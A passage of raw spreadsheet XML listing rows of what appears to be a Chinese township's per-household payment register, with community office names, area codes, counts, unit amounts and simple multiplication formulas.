        <v>225</v>
      </c>
    </row>
    <row r="831" customHeight="1" spans="1:11">
      <c r="A831" s="16" t="s">
        <v>2233</v>
      </c>
      <c r="B831" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C831" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D831" s="17" t="s">
        <v>2234</v>
      </c>
      <c r="E831" s="17" t="s">
        <v>2235</v>
      </c>
      <c r="F831" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G831" s="17">
        <v>1</v>
      </c>
      <c r="H831" s="18">
        <v>365</v>
      </c>
      <c r="I831" s="17">
        <f t="shared" ref="I831:I851" si="39">H831*G831</f>
        <v>365</v>
      </c>
      <c r="J831" s="29">
        <v>45108</v>
      </c>
      <c r="K831" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="832" customHeight="1" spans="1:11">
      <c r="A832" s="16" t="s">
        <v>2236</v>
      </c>
      <c r="B832" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C832" s="17" t="s">
        <v>2176</v>
      </c>
      <c r="D832" s="17" t="s">
        <v>2237</v>
      </c>
      <c r="E832" s="17" t="s">
        <v>2238</v>
      </c>
      <c r="F832" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G832" s="17">
        <v>2</v>
      </c>
      <c r="H832" s="18">
        <v>325</v>
      </c>
      <c r="I832" s="17">
        <f t="shared" si="39"/>
        <v>650</v>
      </c>
      <c r="J832" s="29">
        <v>45108</v>
      </c>
      <c r="K832" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="833" customHeight="1" spans="1:11">
      <c r="A833" s="16" t="s">
        <v>2239</v>
      </c>
      <c r="B833" s="17" t="str">
        <f>B832</f>
        <v>城关镇</v>
      </c>
      <c r="C833" s="17" t="str">
        <f>C832</f>
        <v>西北社区工信局</v>
      </c>
      <c r="D833" s="23" t="s">
        <v>2240</v>
      </c>
      <c r="E833" s="23" t="s">
        <v>2241</v>
      </c>
      <c r="F833" s="17" t="str">
        <f>F832</f>
        <v>4113210106</v>
      </c>
      <c r="G833" s="17"/>
      <c r="H833" s="17"/>
      <c r="I833" s="17"/>
      <c r="J833" s="29"/>
      <c r="K833" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="834" customHeight="1" spans="1:11">
      <c r="A834" s="16" t="s">
        <v>2242</v>
      </c>
      <c r="B834" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C834" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D834" s="17" t="s">
        <v>2243</v>
      </c>
      <c r="E834" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F834" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G834" s="17">
        <v>2</v>
      </c>
      <c r="H834" s="18">
        <v>325</v>
      </c>
      <c r="I834" s="17">
        <f>H834*G834</f>
        <v>650</v>
      </c>
      <c r="J834" s="29">
        <v>45108</v>
      </c>
      <c r="K834" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="835" customHeight="1" spans="1:11">
      <c r="A835" s="16" t="s">
        <v>2244</v>
      </c>
      <c r="B835" s="17" t="str">
        <f>B834</f>
        <v>城关镇</v>
      </c>
      <c r="C835" s="17" t="str">
        <f>C834</f>
        <v>西北社区县社</v>
      </c>
      <c r="D835" s="24" t="s">
        <v>2245</v>
      </c>
      <c r="E835" s="24" t="s">
        <v>2246</v>
      </c>
      <c r="F835" s="17" t="str">
        <f>F834</f>
        <v>4113210106</v>
      </c>
      <c r="G835" s="17"/>
      <c r="H835" s="17"/>
      <c r="I835" s="17"/>
      <c r="J835" s="29"/>
      <c r="K835" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="836" customHeight="1" spans="1:11">
      <c r="A836" s="16" t="s">
        <v>2247</v>
      </c>
      <c r="B836" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C836" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D836" s="17" t="s">
        <v>2248</v>
      </c>
      <c r="E836" s="17" t="s">
        <v>2249</v>
      </c>
      <c r="F836" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G836" s="17">
        <v>1</v>
      </c>
      <c r="H836" s="18">
        <v>365</v>
      </c>
      <c r="I836" s="17">
        <f t="shared" ref="I836:I842" si="40">H836*G836</f>
        <v>365</v>
      </c>
      <c r="J836" s="29">
        <v>45108</v>
      </c>
      <c r="K836" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="837" customHeight="1" spans="1:11">
      <c r="A837" s="16" t="s">
        <v>2250</v>
      </c>
      <c r="B837" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C837" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D837" s="17" t="s">
        <v>2251</v>
      </c>
      <c r="E837" s="17" t="s">
        <v>2252</v>
      </c>
      <c r="F837" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G837" s="17">
        <v>1</v>
      </c>
      <c r="H837" s="18">
        <v>365</v>
      </c>
      <c r="I837" s="17">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J837" s="29">
        <v>45108</v>
      </c>
      <c r="K837" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="838" customHeight="1" spans="1:11">
      <c r="A838" s="16" t="s">
        <v>2253</v>
      </c>
      <c r="B838" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C838" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D838" s="17" t="s">
        <v>2254</v>
      </c>
      <c r="E838" s="17" t="s">
        <v>2255</v>
      </c>
      <c r="F838" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G838" s="17">
        <v>1</v>
      </c>
      <c r="H838" s="18">
        <v>365</v>
      </c>
      <c r="I838" s="17">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J838" s="29">
        <v>45108</v>
      </c>
      <c r="K838" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="839" customHeight="1" spans="1:11">
      <c r="A839" s="16" t="s">
        <v>2256</v>
      </c>
      <c r="B839" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C839" s="17" t="s">
        <v>2257</v>
      </c>
      <c r="D839" s="17" t="s">
        <v>2258</v>
      </c>
      <c r="E839" s="17" t="s">
        <v>2259</v>
      </c>
      <c r="F839" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G839" s="17">
        <v>1</v>
      </c>
      <c r="H839" s="18">
        <v>365</v>
      </c>
      <c r="I839" s="17">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J839" s="29">
        <v>45108</v>
      </c>
      <c r="K839" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="840" customHeight="1" spans="1:11">
      <c r="A840" s="16" t="s">
        <v>2260</v>
      </c>
      <c r="B840" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C840" s="17" t="s">
        <v>2257</v>
      </c>
      <c r="D840" s="17" t="s">
        <v>2261</v>
      </c>
      <c r="E840" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F840" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G840" s="17">
        <v>1</v>
      </c>
      <c r="H840" s="18">
        <v>365</v>
      </c>
      <c r="I840" s="17">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J840" s="29">
        <v>45108</v>
      </c>
      <c r="K840" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="841" customHeight="1" spans="1:11">
      <c r="A841" s="16" t="s">
        <v>2262</v>
      </c>
      <c r="B841" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C841" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D841" s="17" t="s">
        <v>2263</v>
      </c>
      <c r="E841" s="17" t="s">
        <v>2264</v>
      </c>
      <c r="F841" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G841" s="17">
        <v>1</v>
      </c>
      <c r="H841" s="18">
        <v>365</v>
      </c>
      <c r="I841" s="17">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J841" s="29">
        <v>45108</v>
      </c>
      <c r="K841" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="842" customHeight="1" spans="1:11">
      <c r="A842" s="16" t="s">
        <v>2265</v>
      </c>
      <c r="B842" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C842" s="17" t="s">
        <v>2170</v>
      </c>
      <c r="D842" s="17" t="s">
        <v>2266</v>
      </c>
      <c r="E842" s="17" t="s">
        <v>1871</v>
      </c>
      <c r="F842" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G842" s="17">
        <v>3</v>
      </c>
      <c r="H842" s="18">
        <v>290</v>
      </c>
      <c r="I842" s="17">
        <f t="shared" si="40"/>
        <v>870</v>
      </c>
      <c r="J842" s="29">
        <v>45108</v>
      </c>
      <c r="K842" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="843" customHeight="1" spans="1:11">
      <c r="A843" s="16" t="s">
        <v>2267</v>
      </c>
      <c r="B843" s="17" t="str">
        <f>B842</f>
        <v>城关镇</v>
      </c>
      <c r="C843" s="17" t="str">
        <f>C842</f>
        <v>西北社区商业中心</v>
      </c>
      <c r="D843" s="16" t="s">
        <v>2268</v>
      </c>
      <c r="E843" s="16" t="s">
        <v>2269</v>
      </c>
      <c r="F843" s="17" t="str">
        <f>F842</f>
        <v>4113210106</v>
      </c>
      <c r="G843" s="17"/>
      <c r="H843" s="17"/>
      <c r="I843" s="17"/>
      <c r="J843" s="29"/>
      <c r="K843" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="844" customHeight="1" spans="1:11">
      <c r="A844" s="16" t="s">
        <v>2270</v>
      </c>
      <c r="B844" s="17" t="str">
        <f>B843</f>
        <v>城关镇</v>
      </c>
      <c r="C844" s="17" t="str">
        <f>C843</f>
        <v>西北社区商业中心</v>
      </c>
      <c r="D844" s="16" t="s">
        <v>2271</v>
      </c>
      <c r="E844" s="24" t="s">
        <v>2272</v>
      </c>
      <c r="F844" s="17" t="str">
        <f>F843</f>
        <v>4113210106</v>
      </c>
      <c r="G844" s="17"/>
      <c r="H844" s="17"/>
      <c r="I844" s="17"/>
      <c r="J844" s="29"/>
      <c r="K844" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="845" customHeight="1" spans="1:11">
      <c r="A845" s="16" t="s">
        <v>2273</v>
      </c>
      <c r="B845" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C845" s="17" t="s">
        <v>2170</v>
      </c>
      <c r="D845" s="17" t="s">
        <v>2274</v>
      </c>
      <c r="E845" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F845" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G845" s="17">
        <v>2</v>
      </c>
      <c r="H845" s="18">
        <v>325</v>
      </c>
      <c r="I845" s="17">
        <f>H845*G845</f>
        <v>650</v>
      </c>
      <c r="J845" s="29">
        <v>45108</v>
      </c>
      <c r="K845" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="846" customHeight="1" spans="1:11">
      <c r="A846" s="16" t="s">
        <v>2275</v>
      </c>
      <c r="B846" s="17" t="str">
        <f>B845</f>
        <v>城关镇</v>
      </c>
      <c r="C846" s="17" t="str">
        <f>C845</f>
        <v>西北社区商业中心</v>
      </c>
      <c r="D846" s="16" t="s">
        <v>2276</v>
      </c>
      <c r="E846" s="16" t="s">
        <v>2277</v>
      </c>
      <c r="F846" s="17" t="str">
        <f>F845</f>
        <v>4113210106</v>
      </c>
      <c r="G846" s="17"/>
      <c r="H846" s="17"/>
      <c r="I846" s="17"/>
      <c r="J846" s="29"/>
      <c r="K846" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="847" customHeight="1" spans="1:11">
      <c r="A847" s="16" t="s">
        <v>2278</v>
      </c>
      <c r="B847" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C847" s="17" t="s">
        <v>2170</v>
      </c>
      <c r="D847" s="17" t="s">
        <v>2279</v>
      </c>
      <c r="E847" s="17" t="s">
        <v>923</v>
      </c>
      <c r="F847" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G847" s="17">
        <v>1</v>
      </c>
      <c r="H847" s="18">
        <v>365</v>
      </c>
      <c r="I847" s="17">
        <f>H847*G847</f>
        <v>365</v>
      </c>
      <c r="J847" s="29">
        <v>45108</v>
      </c>
      <c r="K847" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="848" customHeight="1" spans="1:11">
      <c r="A848" s="16" t="s">
        <v>2280</v>
      </c>
      <c r="B848" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C848" s="17" t="s">
        <v>2170</v>
      </c>
      <c r="D848" s="17" t="s">
        <v>2281</v>
      </c>
      <c r="E848" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F848" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G848" s="17">
        <v>2</v>
      </c>
      <c r="H848" s="18">
        <v>325</v>
      </c>
      <c r="I848" s="17">
        <f>H848*G848</f>
        <v>650</v>
      </c>
      <c r="J848" s="29">
        <v>45108</v>
      </c>
      <c r="K848" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="849" customHeight="1" spans="1:11">
      <c r="A849" s="16" t="s">
        <v>2282</v>
      </c>
      <c r="B849" s="17" t="str">
        <f>B848</f>
        <v>城关镇</v>
      </c>
      <c r="C849" s="17" t="str">
        <f>C848</f>
        <v>西北社区商业中心</v>
      </c>
      <c r="D849" s="16" t="s">
        <v>2283</v>
      </c>
      <c r="E849" s="16" t="s">
        <v>2284</v>
      </c>
      <c r="F849" s="17" t="str">
        <f>F848</f>
        <v>4113210106</v>
      </c>
      <c r="G849" s="17"/>
      <c r="H849" s="17"/>
      <c r="I849" s="17"/>
      <c r="J849" s="29"/>
      <c r="K849" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="850" customHeight="1" spans="1:11">
      <c r="A850" s="16" t="s">
        <v>2285</v>
      </c>
      <c r="B850" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C850" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D850" s="17" t="s">
        <v>2286</v>
      </c>
      <c r="E850" s="17" t="s">
        <v>323</v>
      </c>
      <c r="F850" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G850" s="17">
        <v>1</v>
      </c>
      <c r="H850" s="18">
        <v>365</v>
      </c>
      <c r="I850" s="17">
        <f>H850*G850</f>
        <v>365</v>
      </c>
      <c r="J850" s="29">
        <v>45108</v>
      </c>
      <c r="K850" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="851" customHeight="1" spans="1:11">
      <c r="A851" s="16" t="s">
        <v>2287</v>
      </c>
      <c r="B851" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C851" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D851" s="17" t="s">
        <v>2288</v>
      </c>
      <c r="E851" s="17" t="s">
        <v>2289</v>
      </c>
      <c r="F851" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G851" s="17">
        <v>1</v>
      </c>
      <c r="H851" s="18">
        <v>365</v>
      </c>
      <c r="I851" s="17">
        <f>H851*G851</f>
        <v>365</v>
      </c>
      <c r="J851" s="29">
        <v>45108</v>
      </c>
      <c r="K851" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="852" customHeight="1" spans="1:11">
      <c r="A852" s="16" t="s">
        <v>2290</v>
      </c>
      <c r="B852" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C852" s="17" t="s">
        <v>2170</v>
      </c>
      <c r="D852" s="17" t="s">
        <v>2291</v>
      </c>
      <c r="E852" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F852" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G852" s="17">
        <v>1</v>
      </c>
      <c r="H852" s="18">
        <v>365</v>
      </c>
      <c r="I852" s="17">
        <f t="shared" ref="I852:I860" si="41">H852*G852</f>
        <v>365</v>
      </c>
      <c r="J852" s="29">
        <v>45108</v>
      </c>
      <c r="K852" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="853" customHeight="1" spans="1:11">
      <c r="A853" s="16" t="s">
        <v>2292</v>
      </c>
      <c r="B853" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C853" s="17" t="s">
        <v>2293</v>
      </c>
      <c r="D853" s="17" t="s">
        <v>2294</v>
      </c>
      <c r="E853" s="17" t="s">
        <v>675</v>
      </c>
      <c r="F853" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G853" s="17">
        <v>1</v>
      </c>
      <c r="H853" s="18">
        <v>365</v>
      </c>
      <c r="I853" s="17">
        <f t="shared" si="41"/>
        <v>365</v>
      </c>
      <c r="J853" s="29">
        <v>45108</v>
      </c>
      <c r="K853" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="854" customHeight="1" spans="1:11">
      <c r="A854" s="16" t="s">
        <v>2295</v>
      </c>
      <c r="B854" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C854" s="17" t="s">
        <v>2293</v>
      </c>
      <c r="D854" s="17" t="s">
        <v>2296</v>
      </c>
      <c r="E854" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F854" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G854" s="17">
        <v>1</v>
      </c>
      <c r="H854" s="18">
        <v>365</v>
      </c>
      <c r="I854" s="17">
        <f t="shared" si="41"/>
        <v>365</v>
      </c>
      <c r="J854" s="29">
        <v>45108</v>
      </c>
      <c r="K854" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="855" customHeight="1" spans="1:11">
      <c r="A855" s="16" t="s">
        <v>2297</v>
      </c>
      <c r="B855" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C855" s="17" t="s">
        <v>2293</v>
      </c>
      <c r="D855" s="17" t="s">
        <v>2298</v>
      </c>
      <c r="E855" s="17" t="s">
        <v>258</v>
      </c>
      <c r="F855" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G855" s="17">
        <v>1</v>
      </c>
      <c r="H855" s="18">
        <v>365</v>
      </c>
      <c r="I855" s="17">
        <f t="shared" si="41"/>
        <v>365</v>
      </c>
      <c r="J855" s="29">
        <v>45108</v>
      </c>
      <c r="K855" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="856" customHeight="1" spans="1:11">
      <c r="A856" s="16" t="s">
        <v>2299</v>
      </c>
      <c r="B856" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C856" s="17" t="s">
        <v>2170</v>
      </c>
      <c r="D856" s="17" t="s">
        <v>2300</v>
      </c>
      <c r="E856" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F856" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G856" s="17">
        <v>1</v>
      </c>
      <c r="H856" s="18">
        <v>365</v>
      </c>
      <c r="I856" s="17">
        <f t="shared" si="41"/>
        <v>365</v>
      </c>
      <c r="J856" s="29">
        <v>45108</v>
      </c>
      <c r="K856" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="857" customHeight="1" spans="1:11">
      <c r="A857" s="16" t="s">
        <v>2301</v>
      </c>
      <c r="B857" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C857" s="17" t="s">
        <v>2293</v>
      </c>
      <c r="D857" s="17" t="s">
        <v>2302</v>
      </c>
      <c r="E857" s="17" t="s">
        <v>432</v>
      </c>
      <c r="F857" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G857" s="17">
        <v>1</v>
      </c>
      <c r="H857" s="18">
        <v>365</v>
      </c>
      <c r="I857" s="17">
        <f t="shared" si="41"/>
        <v>365</v>
      </c>
      <c r="J857" s="29">
        <v>45108</v>
      </c>
      <c r="K857" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="858" customHeight="1" spans="1:11">
      <c r="A858" s="16" t="s">
        <v>2303</v>
      </c>
      <c r="B858" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C858" s="17" t="s">
        <v>2207</v>
      </c>
      <c r="D858" s="17" t="s">
        <v>2304</v>
      </c>
      <c r="E858" s="17" t="s">
        <v>617</v>
      </c>
      <c r="F858" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G858" s="17">
        <v>1</v>
      </c>
      <c r="H858" s="18">
        <v>365</v>
      </c>
      <c r="I858" s="17">
        <f t="shared" si="41"/>
        <v>365</v>
      </c>
      <c r="J858" s="29">
        <v>45108</v>
      </c>
      <c r="K858" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="859" customHeight="1" spans="1:11">
      <c r="A859" s="16" t="s">
        <v>2305</v>
      </c>
      <c r="B859" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C859" s="17" t="s">
        <v>2306</v>
      </c>
      <c r="D859" s="17" t="s">
        <v>2307</v>
      </c>
      <c r="E859" s="17" t="s">
        <v>2308</v>
      </c>
      <c r="F859" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G859" s="17">
        <v>1</v>
      </c>
      <c r="H859" s="18">
        <v>365</v>
      </c>
      <c r="I859" s="17">
        <f t="shared" si="41"/>
        <v>365</v>
      </c>
      <c r="J859" s="29">
        <v>45108</v>
      </c>
      <c r="K859" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="860" customHeight="1" spans="1:11">
      <c r="A860" s="16" t="s">
        <v>2309</v>
      </c>
      <c r="B860" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C860" s="17" t="s">
        <v>2310</v>
      </c>
      <c r="D860" s="17" t="s">
        <v>2311</v>
      </c>
      <c r="E860" s="17" t="s">
        <v>481</v>
      </c>
      <c r="F860" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G860" s="17">
        <v>2</v>
      </c>
      <c r="H860" s="18">
        <v>325</v>
      </c>
      <c r="I860" s="17">
        <f t="shared" si="41"/>
        <v>650</v>
      </c>
      <c r="J860" s="29">
        <v>45108</v>
      </c>
      <c r="K860" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="861" customHeight="1" spans="1:11">
      <c r="A861" s="16" t="s">
        <v>2312</v>
      </c>
      <c r="B861" s="17" t="str">
        <f>B860</f>
        <v>城关镇</v>
      </c>
      <c r="C861" s="17" t="str">
        <f>C860</f>
        <v>中华社区就业办</v>
      </c>
      <c r="D861" s="16" t="s">
        <v>2313</v>
      </c>
      <c r="E861" s="16" t="s">
        <v>1740</v>
      </c>
      <c r="F861" s="17" t="str">
        <f>F860</f>
        <v>4113210108</v>
      </c>
      <c r="G861" s="17"/>
      <c r="H861" s="17"/>
      <c r="I861" s="17"/>
      <c r="J861" s="29"/>
      <c r="K861" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="862" customHeight="1" spans="1:11">
      <c r="A862" s="16" t="s">
        <v>2314</v>
      </c>
      <c r="B862" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C862" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D862" s="17" t="s">
        <v>2316</v>
      </c>
      <c r="E862" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F862" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G862" s="17">
        <v>1</v>
      </c>
      <c r="H862" s="18">
        <v>365</v>
      </c>
      <c r="I862" s="17">
        <f t="shared" ref="I862:I868" si="42">H862*G862</f>
        <v>365</v>
      </c>
      <c r="J862" s="29">
        <v>45108</v>
      </c>
      <c r="K862" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="863" customHeight="1" spans="1:11">
      <c r="A863" s="16" t="s">
        <v>2317</v>
      </c>
      <c r="B863" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C863" s="17" t="s">
        <v>2318</v>
      </c>
      <c r="D863" s="17" t="s">
        <v>2319</v>
      </c>
      <c r="E863" s="17" t="s">
        <v>346</v>
      </c>
      <c r="F863" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G863" s="17">
        <v>1</v>
      </c>
      <c r="H863" s="18">
        <v>365</v>
      </c>
      <c r="I863" s="17">
        <f t="shared" si="42"/>
        <v>365</v>
      </c>
      <c r="J863" s="29">
        <v>45108</v>
      </c>
      <c r="K863" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="864" customHeight="1" spans="1:11">
      <c r="A864" s="16" t="s">
        <v>2320</v>
      </c>
      <c r="B864" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C864" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D864" s="17" t="s">
        <v>2321</v>
      </c>
      <c r="E864" s="17" t="s">
        <v>2322</v>
      </c>
      <c r="F864" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G864" s="17">
        <v>1</v>
      </c>
      <c r="H864" s="18">
        <v>365</v>
      </c>
      <c r="I864" s="17">
        <f t="shared" si="42"/>
        <v>365</v>
      </c>
      <c r="J864" s="29">
        <v>45108</v>
      </c>
      <c r="K864" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="865" customHeight="1" spans="1:11">
      <c r="A865" s="16" t="s">
        <v>2323</v>
      </c>
      <c r="B865" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C865" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D865" s="17" t="s">
        <v>2324</v>
      </c>
      <c r="E865" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F865" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G865" s="17">
        <v>1</v>
      </c>
      <c r="H865" s="18">
        <v>365</v>
      </c>
      <c r="I865" s="17">
        <f t="shared" si="42"/>
        <v>365</v>
      </c>
      <c r="J865" s="29">
        <v>45108</v>
      </c>
      <c r="K865" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="866" customHeight="1" spans="1:11">
      <c r="A866" s="16" t="s">
        <v>2325</v>
      </c>
      <c r="B866" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C866" s="17" t="s">
        <v>2306</v>
      </c>
      <c r="D866" s="17" t="s">
        <v>2326</v>
      </c>
      <c r="E866" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F866" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G866" s="17">
        <v>1</v>
      </c>
      <c r="H866" s="18">
        <v>365</v>
      </c>
      <c r="I866" s="17">
        <f t="shared" si="42"/>
        <v>365</v>
      </c>
      <c r="J866" s="29">
        <v>45108</v>
      </c>
      <c r="K866" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="867" customHeight="1" spans="1:11">
      <c r="A867" s="16" t="s">
        <v>2327</v>
      </c>
      <c r="B867" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C867" s="17" t="s">
        <v>2328</v>
      </c>
      <c r="D867" s="17" t="s">
        <v>2329</v>
      </c>
      <c r="E867" s="17" t="s">
        <v>346</v>
      </c>
      <c r="F867" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G867" s="17">
        <v>1</v>
      </c>
      <c r="H867" s="18">
        <v>365</v>
      </c>
      <c r="I867" s="17">
        <f t="shared" si="42"/>
        <v>365</v>
      </c>
      <c r="J867" s="29">
        <v>45108</v>
      </c>
      <c r="K867" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="868" customHeight="1" spans="1:11">
      <c r="A868" s="16" t="s">
        <v>2330</v>
      </c>
      <c r="B868" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C868" s="17" t="s">
        <v>2328</v>
      </c>
      <c r="D868" s="17" t="s">
        <v>2331</v>
      </c>
      <c r="E868" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F868" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G868" s="17">
        <v>2</v>
      </c>
      <c r="H868" s="18">
        <v>365</v>
      </c>
      <c r="I868" s="17">
        <f t="shared" si="42"/>
        <v>730</v>
      </c>
      <c r="J868" s="29">
        <v>45108</v>
      </c>
      <c r="K868" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="869" customHeight="1" spans="1:11">
      <c r="A869" s="16" t="s">
        <v>2332</v>
      </c>
      <c r="B869" s="17" t="str">
        <f>B868</f>
        <v>城关镇</v>
      </c>
      <c r="C869" s="17" t="str">
        <f>C868</f>
        <v>中华社区民政局</v>
      </c>
      <c r="D869" s="24" t="s">
        <v>2333</v>
      </c>
      <c r="E869" s="25" t="s">
        <v>2334</v>
      </c>
      <c r="F869" s="17" t="str">
        <f>F868</f>
        <v>4113210108</v>
      </c>
      <c r="G869" s="17"/>
      <c r="H869" s="17"/>
      <c r="I869" s="17"/>
      <c r="J869" s="29"/>
      <c r="K869" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="870" customHeight="1" spans="1:11">
      <c r="A870" s="16" t="s">
        <v>2335</v>
      </c>
      <c r="B870" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C870" s="17" t="s">
        <v>2336</v>
      </c>
      <c r="D870" s="17" t="s">
        <v>2337</v>
      </c>
      <c r="E870" s="17" t="s">
        <v>578</v>
      </c>
      <c r="F870" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G870" s="17">
        <v>1</v>
      </c>
      <c r="H870" s="18">
        <v>365</v>
      </c>
      <c r="I870" s="17">
        <f>H870*G870</f>
        <v>365</v>
      </c>
      <c r="J870" s="29">
        <v>45108</v>
      </c>
      <c r="K870" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="871" customHeight="1" spans="1:11">
      <c r="A871" s="16" t="s">
        <v>2338</v>
      </c>
      <c r="B871" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C871" s="17" t="s">
        <v>2339</v>
      </c>
      <c r="D871" s="17" t="s">
        <v>2340</v>
      </c>
      <c r="E871" s="17" t="s">
        <v>683</v>
      </c>
      <c r="F871" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G871" s="17">
        <v>2</v>
      </c>
      <c r="H871" s="18">
